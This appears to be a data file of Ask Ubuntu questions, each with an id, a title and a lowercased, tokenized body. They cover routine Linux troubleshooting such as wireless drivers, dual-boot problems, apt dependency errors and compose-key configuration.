377411	italc 2.0 only sees base user	after compiling and installing italc 2.0 it works ok but only if the user is connected using the original ( administrative ) account . in other cases , i get an annoying warning `` somebody from x.x.x.x tries to connetc to this computer but can not autenticate '' . it is clearly a permission issue , but i really do n't have a clue as how to fix it . ideas anyone ? thanks in advance ps : i do n't want to use epoptes or similar , since the enveronment is mixed windows/linux , and i ca n't use italc 1.0 since it does n't work well with windows 7 or 8 .
377412	how do i change the backup settings on ubuntu one ?	the initial decisions i made when setting up ubuntu one were apparently awful decisions . i chose to `` keep forever '' and i 'm not sure what else . therefore , what occurred within not even two months was a complete filling of the 5 gb space i have . i manually deleted all 14 quatrillion files on ubuntu one 's web page , but i do n't want to do that all the time . how do i go back and change all of those initial settings ?
377413	how to troubleshoot a macvtap network in kvm/virt-manager	i have a virtual machine running under qemu-kvm , on a 13.10 host . i am using virt-manager to define the machine , and i have added a virtual nic , using the new macvtap driver . i have the following definition : < interface type='direct ' > < mac address='52:54:00:1f : dd : c4'/ > < source dev='eth0 ' mode='bridge'/ > < model type='virtio'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x03 ' function='0x0'/ > < /interface > on the host machine , i can see that the tap interface is created : $ ip link 5 : macvtap0 @ eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown mode default qlen 500 link/ether 52:54:00:1f : dd : c4 brd ff : ff : ff : ff : ff : ff $ ls /dev/tap5 /dev/tap5 but in the virtual machine , interface eth0 is unable to access the network . dhcp fails . static configuration obviously works , but then i can not ping anything . i have no iptables rules , neither on the host , nor in the virtual machine . so , how can i troubleshoot this problem ?
377417	problems with building drivers for bcm4313	i 'm having a problem with my bcm4313 wireless network card ( which i know many others have ) but my problem is when i try to use make to build my driver i get the following : kbuild_nopedantic=1 make -c /lib/modules/uname -r/build m=pwd make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-13-generic' cfg80211 api is prefered for this kernel version using cfg80211 api make [ 2 ] : *** no rule to make target /usr/local/src/bcmwl-6.30.223.141+bdcom/src/shared/linux_osl.o ' , needed by /usr/local/src/bcmwl-6.30.223.141+bdcom/wl.o ' . stop . make [ 1 ] : *** [ _module_/usr/local/src/bcmwl-6.30.223.141+bdcom ] error 2 make [ 1 ] : leaving directory /usr/src/linux-headers-3.11.0-13-generic' make : *** [ all ] error 2 i managed to build the drivers in linux mint and get it working but i changed to ubuntu since mint was unstable for some reason . and now i ca n't build the drivers , so i 'm very grateful for any help ! i 've googled all morning and ca n't find anything that works . i 'm btw using the ubuntu 13.10
377418	how do i get a tp link wn725 nano wireless adapter working ?	i 'm using ubuntu on my packard bell desktop pc . i 've installed ubuntu and it works fine . but alas i cant get my wifi dongle to work in it . the dongle is a tp link wn725n nano adapter . the dongle still works fine when i switch to windows but not found in ubuntu . i 've connected the computer directly with a ethernet cable and ubuntu goes online no problem . any hints or tips on how to locate and install the drivers into ubuntu would be very much appreciated .
377419	problems with ubuntu 13/win7 dual boot install	i am a complete n00b to linux but am determined to ditch windows eventually ... .for now i would like to dual boot so i can get used to the new os . during and after installation i run into a few problems . 1st problem is that the ub installer does not detect my win7x64 install ... this did n't phase me too much as i had the option 'something else ' which would allow me to select the drive to install to , considering the follow up problems it may be significant though ... after having allocated swapspace and partition i wanted ubuntu i let it roll ... after message that installation was complete and system needed rebooted i did just that ... . then after having edited the mbr to allow me to select a different os then win7 ( with easybcd ) i tried selecting ubuntu ... . then i get some grub thing ( looks like command prompt to me or some such ) checking what commands i can enter with tab , i decided i 'd try the thing that looks most like what i want to do , so i typed 'boot ' -- 'enter' that creates an errormessage : kernel is not loaded ... and that 's were i am stuck perhaps my explanation is a little incoherent but thats prbbly due to the fact i have no clue whats going on ... . anybody that could help me out ? thx in advance : )
377420	can not start ubuntu 12.04 : urgent	i am haveing problems with my 3g usb internet stick ( hsupa mf195 ) . i tried everything and i just can not get it working . the last thing i tried to do is described here http : //news.softpedia.com/news/how-to-connect-the-zte-mf636db-usb-modem-on-ubuntu-158663.shtml i have to the second part : '' save and close the text file . just in case , reboot your machine ! `` after that i can not start my os anymore . i just get ubuntu and the pinkish start screen and that is it . i have some important data on it . me return everything back to normal ! update : i managed to enter terminal and get to /etc/udev/rules.d/ but i can not delete ztemf195 . rules file ! i tried changing the permissions , changing the content , forcing the delete but i get that it is read-only file and that it can not be deleted ?
377422	the alt key in dwarf fortress ( 13.10 )	i am trying to play df adventure mode , and when i press alt + ( direction ) to navigate dangerous terrain , it does not register the action . i have tried disabling the key through the settings- > keyboard- > shortcuts- > launcher menu , but it does nothing . it shows the key as disable , yet i still do not have access to the alt key within df . i can not find any other fixes anywhere . does anyone have any advice ?
377426	winff exits with `` unrecognized option '' error	i installed ffmpeg completely from this guide . i installed winff in ubuntu but when i want to try convert i face to this error : ffmpeg version git-2013-11-15-995f450 copyright ( c ) 2000-2013 the ffmpeg developers built on nov 15 2013 18:32:56 with gcc 4.8 ( ubuntu/linaro 4.8.1-10ubuntu8 ) configuration : -- disable-yasm libavutil 52 . 53.100 / 52 . 53.100 libavcodec 55 . 43.100 / 55 . 43.100 libavformat 55 . 21.100 / 55 . 21.100 libavdevice 55 . 5.100 / 55 . 5.100 libavfilter 3 . 91.100 / 3 . 91.100 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 17.104 / 0 . 17.104 unrecognized option 'preset ' . error splitting the argument list : option not found press enter to continue ... i installed libavcodec-extra-53 also..what 's soution ?
377428	windows 8.exe ... ?	i have had windows eight and ubuntu 13.04 dual booting and working fine ( using easybcd ) i had created partition for ubuntu of exactly 20gb . some time later , after never using ubuntu , i went into window 's partition tool and deleted my ubuntu partition . it said it erased everything on it . i then added this 20gb onto my hardrive/windows8 . i also deleted easy bcd . everything was going fine . i turned the computer off that night and this morning it said 'windows failed to start.a recent hardware or software change might be the cause ' message . it also said ntx/grub or something missing . i re-installed ubuntu from a usb and all my data and windows system files are there , but i am stuck running ubuntu . i believe all i need to do is find the 'windows8.exe ' file and boot from that . can someone please help here ? my error report for boot-repair is : http : //paste.ubuntu.com/6426199/
377430	lost bass in headphones and music sounds like in bathroom	my headphone do n't have bass and also music sounds like in bathroom ) ) . when i 'm using my headphone it 's not giving bass on my laptop with win7 and on pc with debian . but it 's okay on my pc with win7 . i did n't install any driver for headphone on these 3 computers . and i did n't set any options , other headphone worked fine on the laptop . so now what can be a problem ? why it 's not working well ? regards
377432	about superlab software	i am a windows user . i want to use ubuntu , but i am worried about how could i use those software like superlab , which is used in experiments and linux version of this software is not available . in such circumstances , what to do ?
377435	why is ssh x-forwarding of browser not working for internal ip addresses ?	i want to access my private ubuntu server at home during lunch break at and from work . the problem was , that at work , the ssh port is blocked by the firewall ( default setting ) . so i changed the configuration of my ssh server , so that he also listens to port 443 ( ssl ) . now i can access my server via ssh alright with ssh -p 443 xxx.xxx.xxx.xxx now i wanted to change the configuration of the router in my local network at home . so i tried accessing it from the server 's browser via x-forwarding : ssh -p 443 -xy xxx.xxx.xxx.xxx user @ servername : ~ # > firefox like that , i can browse external sites fine , but i ca n't access the server or the router via their normal ip addresses ( 10.0.1.1 , 10.0.1.2 ) . why ? and how can i change that / what can i do ?
377436	daily builds for vim	is there any ppa that allows to be up to date with the latest changes in vim , even they are buggy or not ? i would like to know that i use the latest vim build even it is unstable . also , the following output can be useful : $ apt-cache policy vim vim : installed : ( none ) candidate : 2:7.3.429-2ubuntu2.1 version table : 2:7.3.429-2ubuntu2.1 0 500 http : //ro.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 2:7.3.429-2ubuntu2 0 500 http : //ro.archive.ubuntu.com/ubuntu/ precise/main amd64 packages
377438	how can i recursively delete all files of a specific extension in the current directory ?	how do i safely delete all files with a specific extension ( e.g . .bak ) from current directory and all subfolders using one command-line ? simply , i 'm afraid to use rm since i used it wrong once and now i need advice .
377439	dual boot ubuntu with win8 with only 1 hdd and 1 partition	i 'm wondering if its possible to install ubuntu alongside win8 on a computer with only one hard drive ( hdd , 750gb ) which has only one partition ( there are some additional small recovery partitions ) . it seems some people claim that one should not resize the partition on which windows is located . is that the case and if so wo n't i be able to dual boot ?
377443	problem with grep command	i have three files testx , testy and testz all in same directory sikh . all three files contain same data or content . the contents are : aaabb aaaaa aaaaa bbbcc bbbbb bbbbb ffâff ccccc ccccc cccdd ddddd ddddd now i want to display the text containing a in all three files . what i have done so far is : grep '^a'* but it does not display anything . so can anyone help me sort this out .
377445	how can i connect ubuntu through windows via localhost ?	display of my laptop is not working , in order to save files in it i want to connect to it from another laptop in localhost and move files to safety . i can connect to it via putty from xp laptop like 192.168.2.5 and it successfully connects but i need a visual connection . please do n't suggest plugging another monitor or installing ubuntu beside xp to establish visual connection . what is the easiest way to establish visual connection between xp and ubuntu ?
377449	remastersys backup / ubiquity problem	i think you guys are aware about remastersys . a backup program for ubuntu that does n't support latest versions of ubuntu anymore but just recently . it is said that remastersys has been taken over by the os 4 team and supports ubuntu 13.04 and above as well ! . so when i fired the `` backup/ dist process '' , i always come up with the same error . i am 100 % sure that this has something to do with ubiquity . i have all ubiquity essentials installed with the exception for that slideshows . i keep getting the same error over and over again and i am unable to fix this up . what could have i not installed ? what do you think is blocking ubiquity from opening ? are there any proper alternatives to remastersys ? i took this image by selecting `` start the installer directly '' because in the live mode , it does n't even react to any extent .
377450	software updater will not update : gpg error : signatures were invalid:	i 'm running ubuntu 13.04 and am trying to update . when i attempt to do it through the software updater the program crashes before i even have the opportunity to put in a password to authenticate . when i enter sudo apt-get update in a terminal the update process starts , but quickly i start seeing error messages such as these : err http : //packages.medibuntu.org raring release.gpg something wicked happened resolving 'packages.medibuntu.org : http ' ( -11 - system error ) w : gpg error : http : //ppa.launchpad.net raring release : the following signatures were invalid : badsig 4a272f2b298c62a6 launchpad ppa for ffmulticonverter packagers anyone got any ideas ? i can provide more system info if needed .
377451	save option in okular	i am using okular for ubuntu 12.04 gnome , but it does not show any option to save the document . even if i try to use save as it does not save the changes in another file . is there any solution for this issue ?
377454	wifi dropping every 20 mins	my wifi keeps dropping every 20 minutes or so ( on my home network ) , and will not let me connect again until i reboot my laptop . this is not a network problem , as wifi is stable on my cell phone . could this be a ubuntu problem , or a hardware problem ? i am running a lenovo x220 . related question : ubuntu keeps disconnecting from wifi output from sudo lspci -nnk | grep -b4 network : 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) subsystem : lenovo device [ 17aa:21da ] kernel driver in use : mei kernel modules : mei 00:19.0 ethernet controller [ 0200 ] : intel corporation 82579lm gigabit network connection [ 8086:1502 ] ( rev 04 ) -- kernel modules : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 04 ) subsystem : lenovo device [ 17aa:21da ] kernel modules : i2c-i801 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6205 [ taylor peak ] [ 8086:0085 ] ( rev 34 )
377459	is my openvpn connection doing its job ?	my first question is whether or not my openvpn connection is working as it is supposed to ( routing all network traffic via the tun0 interface ) . when i type netstat -rn i get the following : $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 10.8.0.1 10.8.0.17 255.255.255.255 ugh 0 0 0 tun0 10.8.0.17 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 does this mean that all data traffic is encrypted and routed via my openvpn server ? further on : could someone please explain to me what all this information means ? what do different rows represent ? what do all those flags mean ? mss ? window ? irtt ? etc ...
377463	link to a script using 'dirname '	i have a script placed in /opt/mydir/myscript.sh which calls java , setting its directory as the classpath : scriptdir=`dirname $ 0` java -mx3g -cp `` $ scriptdir/* '' myapp.jar i have created a link to this script in /usr/local/bin/myscript but if i run it , the classpath is messed up . could anyone suggest me a workaround ? how to deal in such situations ? thanks .
377466	ubuntu 13.10 32-bit , crossover error , installation	i just tried to install crossover ( codeweavers ) via the ubuntu software center in ubuntu 13.10 32-bit , but it did n't finish the installation . it just got stuck at about 90 % ( progress bar ) . after waiting approximately one hour , nothing happened . the installation was stuck , so i decided to restart the computer . the issue now is : every time i try to reinstall crossover via software-center , ubuntu gives me a message box with the following error message : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies crossover-trial : depends : crossover-trial-bin ( = 12.5.0-0ubuntu1 but 12.5.0-0ubuntu1 is not going to be installed ) any ideas about how to fix it ?
377468	error trying to upgrade from 12.04 to 14.04	hey im new to ubuntu and im trying to upgrade my system and i get few errors so i typed sudo update-manager -d and simply i clicked the upgrade button.. soon enough i get the following error w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/source/sources 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . what could be the problem and how to fix it ?
377470	tp-link wn725n , unable to get drivers to work with 13.04 after upgrade ( worked on 12.10 and prior )	i went back to my desktop after a bunch of months not using it , and i decided to upgrade ubuntu to the newest version ( i was still in 12.04 ) . i had to download a driver for my tp-link usb wireless device ( tl-wn725n , chip rtl8188eu ) , which worked flawlessly in 12.04 , then stopped working after the upgrade to 12.10 . i recompiled the driver and it worked again ( my router is pretty far from my room so i ca n't really use an ethernet cable without moving it ) . then problems started ! after upgrading to 13.04 , it gives me an error when i try to run it . i looked on google and found many solutions , but always with the rtl8188cus chip , which is n't using the same driver as mine ... so i 'm kinda stuck ! i could plug it to upgrade to 13.10 , but i have no idea if my driver will work better on this version . any solution ? i would paste the error , but i 'm at work currently . i 'll add it later when i 'm home , if needed to fix the problem ! thanks ! i love ubuntu , hope i 'll find a way to make it compatible with my wireless ! : )
377471	ubuntu software centre not responding	software centre is not responding . whenever i open it the screen becomes black and i can not do any thing . instead i have to force quit the application , please provide me a solution .
377472	how to upgrade pulseaudio to the latest available version ?	i 'm using ubuntu 12.04 ( i ca n't upgrade right now ) and i 'm using pulseaudio 2.x . i have some sound issues with vlc and others and i 'd like to know if i can upgrade to pulseaudio 3.x or even 4.x with this ubuntu version , and if i can is there an up-to-date repository ?
377473	moving data from external ntfs usb backup drive to root partition internal adaptec 2820sa raid 5	i am a bit of a newbie . i have set up all the drives . i can see them and access the files . when i attempt to move any file from the usb drive to the root drive , it says i do n't have root permission . the reason given says that the drive is owned by root . i would like to make the drive available to download all data for easy backup storage . i have downloaded all of the raid programs and adaptec drivers i could find in the software locator . any help would be greatly appreciated .
377476	minecraft running slow	guys i had installed ubuntu 13.10 and minecraft was running normal 30 fps . one day i had black screen problems so i reinstall my linux ( format ) and minecraft was running on 12 to 14 fps . i have installed hava 7 , java 8 , openjdk 7 and everything requires but minecraft stil slow what to do . dont tell me abou pc specs because my pc is expensive so i dont have problem with specs : core 13 3.30 ghz radeon hd 7850 oc 12gb ram 1600 mhz
377477	customizing the compose key 's behavior ?	i 'm trying to make it so that these compose sequences produce these characters : aa == > ä oo == > ö uu == > ü aa == > ä oo == > ö uu == > ü i tried modifying my ~/.xcompose , and my system compose , but it is n't working ( after a complete restart ) . i still get the defaults . ( aa == > å oo == > [ nothing ] uu == > ŭ aa == > å oo == > ° uu == > ŭ ) what 's the trick for getting this to work ? here 's my ~/.xcompose ( exactly as it is now ; a bit of `` babbling '' from initial experiments and notes is in there too , but i do n't think it should be affecting anything , ne ? ) : # ~/.xcompose # this file defines custom compose sequences for unicode characters # import default rules from the system compose file : include `` /usr/share/x11/locale/en_us.utf-8/compose '' # to put some stuff onto compose key strokes : < multi_key > < s > < s > : `` ß '' ssharp # latin small letter sharp s < multi_key > < a > < a > : `` ä '' adiaeresis # latin capital letter a with diaeresis < multi_key > < o > < o > : `` ö '' odiaeresis # latin capital letter o with diaeresis < multi_key > < u > < u > : `` ü '' udiaeresis # latin capital letter u with diaeresis < multi_key > < a > < a > : `` ä '' adiaeresis # latin small letter a with diaeresis < multi_key > < o > < o > : `` ö '' odiaeresis # latin small letter o with diaeresis < multi_key > < u > < u > : `` ü '' udiaeresis # latin small letter u with diaeresis < multi_key > < ; > < s > : `` ß '' ssharp # latin small letter sharp s < multi_key > < ; > < a > : `` ä '' adiaeresis # latin capital letter a with diaeresis < multi_key > < ; > < o > : `` ö '' odiaeresis # latin capital letter o with diaeresis < multi_key > < ; > < u > : `` ü '' udiaeresis # latin capital letter u with diaeresis < multi_key > < ; > < a > : `` ä '' adiaeresis # latin small letter a with diaeresis < multi_key > < ; > < o > : `` ö '' odiaeresis # latin small letter o with diaeresis < multi_key > < ; > < u > : `` ü '' udiaeresis # latin small letter u with diaeresis < multi_key > < s > < ; > : `` ß '' ssharp # latin small letter sharp s < multi_key > < a > < ; > : `` ä '' adiaeresis # latin capital letter a with diaeresis < multi_key > < o > < ; > : `` ö '' odiaeresis # latin capital letter o with diaeresis < multi_key > < u > < ; > : `` ü '' udiaeresis # latin capital letter u with diaeresis < multi_key > < a > < ; > : `` ä '' adiaeresis # latin small letter a with diaeresis < multi_key > < o > < ; > : `` ö '' odiaeresis # latin small letter o with diaeresis < multi_key > < u > < ; > : `` ü '' udiaeresis # latin small letter u with diaeresis # examples : # < multi_key > < apostrophe > < apostrophe > : `` ☕ '' acute # acute accent # < multi_key > < minus > < greater > : `` → '' u2192 # compose - > # < multi_key > < colon > < parenright > : `` ☺ '' u263a # compose : ) # < multi_key > < b > < t > < w > : `` by the way '' # compose b t w # < multi_key > < less > < p > : `` < p > < /p > '' # compose < p and here 's the beginning of my system compose ( too big to paste the whole thing ) . i regex-replace 'd out any lines that would 've had the same beginning as the new lines i added at the top . ( so < multi_key > < ( [ aauuoo ] ) > < \1 > gets no matches beyond the lines i added at the top . ) /usr/share/x11/locale/en_us.utf-8/compose # utf-8 ( unicode ) compose sequence # david.monniaux @ ens.fr # # part 1 - manual definitions # spacing versions of dead accents < multi_key > < s > < s > : `` ß '' ssharp # latin small letter sharp s < multi_key > < a > < a > : `` ä '' adiaeresis # latin capital letter a with diaeresis < multi_key > < o > < o > : `` ö '' odiaeresis # latin capital letter o with diaeresis < multi_key > < u > < u > : `` ü '' udiaeresis # latin capital letter u with diaeresis < multi_key > < a > < a > : `` ä '' adiaeresis # latin small letter a with diaeresis < multi_key > < o > < o > : `` ö '' odiaeresis # latin small letter o with diaeresis < multi_key > < u > < u > : `` ü '' udiaeresis # latin small letter u with diaeresis ( compose-ss == > ß is the default behavior , and does already work . )
377480	ubuntu 13.10 is not booting and shutdown !	i was installing the ubuntu 13.10 using usb flash drive and my bios is compilable with the usb boot and and usb drive is also boot-able ( install windows with it before ) . the problem is when plug in the usb then ( with uefi enable ) it show a boot mean ( not gui one ) and if select any option it shut-down . and when plug the usb and disable uefi it boot to purple screen with two icon at bottom and then after some time { 5 sec } it shut-down . help plz .
377483	how to fix this shutdown indicator problem	i have installed ubuntu 13.10 . ubuntu has problem with shutdown indicator , i ca n't shutdown laptop using this shutdown indicator but i tried terminal way sudo poweroff it 's working perfectly . any help appriciate
377484	how to boot live from a dvd when my macbook 's optical drive does n't work ?	i 've successfully burned a ubuntu boot dvd from os x ( snow leopard ) on my macbook pro . the problem is , the built in optical drive kicked the bucket a few years ago and i 've been using an external optical drive that connects via usb . when i try to boot ubuntu from the dvd in this drive , it looks like my computer does n't even recognize the drive during start up . i hold alt while the computer turns on and it only gives me the option to boot os x from the hard drive . any suggestions ?
377486	i forgot password for my ubuntu desktop . how can i get in ?	how can i access my ubuntu account if i forgot my password ?
377489	how can i install downloaded softwares in ubuntu	i am using ubuntu for the first time and i would like to install a couple of software : plink , genecluster , meta , pyenv and bioconductor . most of them have been downloaded and unpacked in my home directory . when i try to use following command once at the time : sudo apt-get install plink-core , sudo apt-get install genecluster-core , sudo apt-get install meta-core and sudo apt-get install bioconductor-core . i got this message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package plink-core e : unable to locate package genecluster-core e : unable to locate package meta-core e : unable to locate package pyenv-core e : unable to locate package bioconductor-core could someone tell me how to proceed with these installations ?
377491	remove keyboard indicator in gnomebuntu 13.10	i 'm running the new gnomebuntu in a vm and would like to disable the keyboard indicator from my task bar as it looks pretty ugly . does anyone know how i go about doing this ? there are plenty of posts on here for this in unity but i 'm unaware as to the whether the same process applies . any help would be greatly appreciated .
377497	developer.ubuntu.com : why my application is still in draft state ?	i decided to upload my open source application to the ubuntu software center . firstly , i have created ppa ( https : //launchpad.net/~source-code-analyzer/+archive/ppa ) . then i : created application at https : //myapps.developer.ubuntu.com/dev/apps/ , added all needed materials ( icons , description , screenshot ) , uploaded text file ppa-info.txt ( with link to my ppa and application source code ) . i have checked - all mandatory fields in application profile where filled with information , but still my application state is `` draft '' . my questions : - is there any interface which will show me what field ( s ) are empty ? - how i can contact myapps.developer.ubuntu.com support ? - what steps should i do for providing my application to the review ? thanks . mark zaslavskiy .
377501	ubuntu 13.10 live cd does not work	i have a laptop with switchable amd graphics card ( both are amd ) . i tried to install ubuntu through the live session but whenever i click try ubuntu , the low graphics card prompt appears . after giving run in low graphics for this session , a dialog appears asking me to wait for a minute for my graphics card to refresh . i 've been waiting for almost 2 hours . only a black screen is present . i 've tried nomodeset already . no luck . thats the 5th time its happening today . however ubuntu 13.04 64-bit live cd works perfectly . how do i get the live cd version running for 13.10 ?
377502	installation problems with 13.10	trying to install 13.10 on my dell latitude d610 . i had been using 10.04 but was having issues with that so wanted to upgrade . after many problems with the usb stick i was finally able to get the software loaded to the stick . now after installing about 3 times , i was able to erase the old version and start on the new . it seems to be hanging @ configuring the bcmwl-kernel source . the cursor is just spinning . i am letting it run to see if this will ever install . any suggestions ?
377504	mac address error in console constantly repeating after connecting to school network	i am continually getting this repeated error message whenever i connect to my schools network , via a wifi connection . if i find a way to hard wire in i do not receive this error message . this is what i found in my system log that repeats continuously . it 's slightly distracting because it appears anywhere i type in my console , even when writing in an editor like vi or nano : nov 15 09:40:43 programming_box kernel : [ 2420.002726 ] error @ wl_cfg80211_get_station : wrong mac address nov 15 09:40:49 programming_box kernel : [ 2426.007388 ] error @ wl_cfg80211_get_station : wrong mac address nov 15 09:40:49 programming_box kernel : [ 2426.007459 ] error @ wl_cfg80211_get_station : wrong mac address nov 15 09:40:55 programming_box kernel : [ 2431.967762 ] error @ wl_cfg80211_get_station : wrong mac address is there any reason for this or possibly a way i can get rid of it ?
377505	copy server/applications settings and data to new ubuntu install	so here 's where i 'm at : i 've had ubuntu server 12.04 install on a 250gb drive for a while , and i 've spent some time getting it configured properly with a number of programs . i want to migrate the data/config to a bigger drive , but instead of using dd or clonezilla ( like a normal person ) , i started with a clean install on the new drive - i wanted to change the main admin username , install without home folder encryption ( which i removed by hand from the old drive ) , and stop using lvm for a single-drive machine . so here 's where i 'm at : i have ubuntu server installed on the new disk , and the main partition from the old disk is currently mounted at /mnt/old_drive , so i have access to all the files and things . i also have a dump list of all the packages i installed on the old machine . so here 's my question : how much of this stuff can i just copy over directly , reboot and have it work ? just /etc ? i 've got a couple things , like mysql and postgresql dbs , that i 'm not sure if i can just copy over with cp . or would i be better off installing each package and configuring/migrating them individually ? i think the fact that i change the admin username on the new install may add a wrinkle ( or not ) . edit : i also do know i need to edit fstab rather than copying it over .
377506	computer hangs when marking text	i 'm new to the ubuntu community . using version 12.04 . i have a annoying problem , my os hangs up and all menus disappears when i highlight text . `` the left and upper menu dissapears . '' `` standard view '' the programs i run is apache server and mysql through xampp , bluefish editor , firefox web browser . anyone got a clue what is happening here ? i have to restart the computer every time it happends .
377507	qt mysql driver	i installed qt 5.1.1 using .run file and i could n't connect to a mysql database ( even though qsqldatabase : :drivers ( ) showed it as an available ) . i found out that i needed to recompile the mysql driver . and to do that i installed a package qmake 4.8.1 . i could n't compile the driver , i figured it 's because of the version difference . now i 'm thinking it would be easier for me to just install qt 4.8 instead but i 'm not sure how to do that . there are qt 4.8.1 libraries on the official website , but i 'm not sure what should i do with them . should i compile them and get an ide and connect them somehow or something ?
377512	how do i move window buttons from left to right using command line or by editing a specific file ?	i know that ubuntu has a file hidden somewhere deep inside it that holds the old metacity values for changing the position of the menu buttons . my question is how can i do this without ubuntu tweak in ubuntu classic ? `` why not use the thing that 's already done ? '' that thing was written by finding this file once then making a mental note of it to create a gui to solve the problem , which is all fine and dandy . i want to learn where this stuff is for myself because i like knowing how to do things from the command line . ( also , come on , how many times have you seen a dude in a coffee shop using the command line interface to mess with stuff ? ) it could be helpful to note the directory for others because of installing other themes to gnome-classic ( cough new macbuntu port cough ) i would also like to know if this is a text file that i may be able to change with vim , emacs , gedit , etc .
377515	can not install a library downloaded : unmet dependencies	i have this library downloaded , but when i enter bash install-libraries.sh the following errors shows up . what should i do ? danyalzahid @ ubuntu : ~/desktop/project $ bash install-libraries.sh reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : freeglut3-dev : depends : libgl1-mesa-dev but it is not going to be installed or libgl-dev depends : libglu1-mesa-dev but it is not going to be installed or libglu-dev depends : libxt-dev but it is not going to be installed depends : libxext-dev but it is not going to be installed libglew1.6-dev : depends : libgl1-mesa-dev but it is not going to be installed or libgl-dev depends : libglu1-mesa-dev but it is not going to be installed or libglu-dev e : unable to correct problems , you have held broken packages .
377516	sharing of swap partiton between linux systems ?	i have a laptop on which i have installed ubuntu 12.04 and windows now just for learning purposes i am going to install backtrack os on it . my laptop has 4 gb of ram so according to the recommendation i have allocated 8 gb of swap space on my hard drive . can i share the swap space between these two os ( backtrack and ubuntu ) i really do n't want to waste 8 gb of more space for swap ( because as i have noticed it is rarely used and as far as i know os does n't store any data in swap space , does it ? ) so is there a way with which i can share this 8 gb swap partition ? if yes how ?
377517	installed simon does n't start : could not initialize scenarios and shadow dictionary	i have installed simon , the speech recognition application in my ubuntu 13.04 64amd system , with following command : sudo apt-get -- install-suggests -- install-recommends install simon after the installation , when i tried to open the application via desktop icon , following error message comes : i couldnt find any solution with googling . but here in kde-apps.com forum , it was told to compile the application manually , but it is difficult for me . is there any other solution ? this is a useful application for people with physically altered abilities .
377518	ca n't login in ubuntu with my user account trough gui ( lightdm )	at first i could n't login trough gui ( lightdm login screen ) . now also tty scren gives me acces.your.files.desktop and readme.txt , then after messing with ecryptfs-mount-private , which gives this output : error : encrypted private directory is not setup properly , and trying to do this with live cd i still ca n't access files of my other account . similar problems to mine : ca n't access my user account ubuntu 12.04 can not login to my user account i ca n't remove ~/.xauthority as i ca n't get to those files .
377520	why does n't my audio player report file sizes ?	i have a sansa fuze ( that recently started complaining it is out of space , which is puzzling to me ) and a new computer with 13.10 on it . when i plug the fuze in , it appears in nautilus , but gives it 's location as mtp : // [ usb:003,002 ] / i 've worked out that mountpoint with the help of where are mtp mounted devices located in the filesystem ? but i ca n't use the disk usage analyzer to figure out what is taking up space ( it reports everything as 0 % ) and it is n't reporting folder sizes to nautilus . is this an issue in how i 've mounted it or is my fuze corrupted in some way ?
377521	apt-get install automatically cancelled	when i 'm doing an update or installation on ubuntu 13.10 , the task is automatically cancelled in the terminal . i got this error since that the \boot partition was missing some space . i fixed this issue in removing older kernels , but installation still locked . $ sudo apt-get install python-numpy python-scipy python-networkx [ sudo ] password for steve : lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait python-numpy est déjà la plus récente version disponible . python-numpy passé en « installé manuellement » . les paquets supplémentaires suivants seront installés : graphviz libcdt4 libcgraph5 libexpat1-dev libgraph4 libgvc5 libgvpr1 libpathplan4 libpython-dev libpython2.7-dev python-dateutil python-decorator python-dev python-matplotlib python-matplotlib-data python-pygraphviz python-pyparsing python-tz python-yaml python2.7-dev paquets suggérés : graphviz-doc ipython python-configobj python-excelerator python-fltk python-matplotlib-doc python-traits les nouveaux paquets suivants seront installés : graphviz libcdt4 libcgraph5 libexpat1-dev libgraph4 libgvc5 libgvpr1 libpathplan4 libpython-dev libpython2.7-dev python-dateutil python-decorator python-dev python-matplotlib python-matplotlib-data python-networkx python-pygraphviz python-pyparsing python-scipy python-tz python-yaml python2.7-dev 0 mis à jour , 22 nouvellement installés , 0 à enlever et 1 non mis à jour . il est nécessaire de prendre 41.1 mo dans les archives . après cette opération , 84.9 mo d'espace disque supplémentaires seront utilisés . souhaitez-vous continuer [ o/n ] ? o annulation .
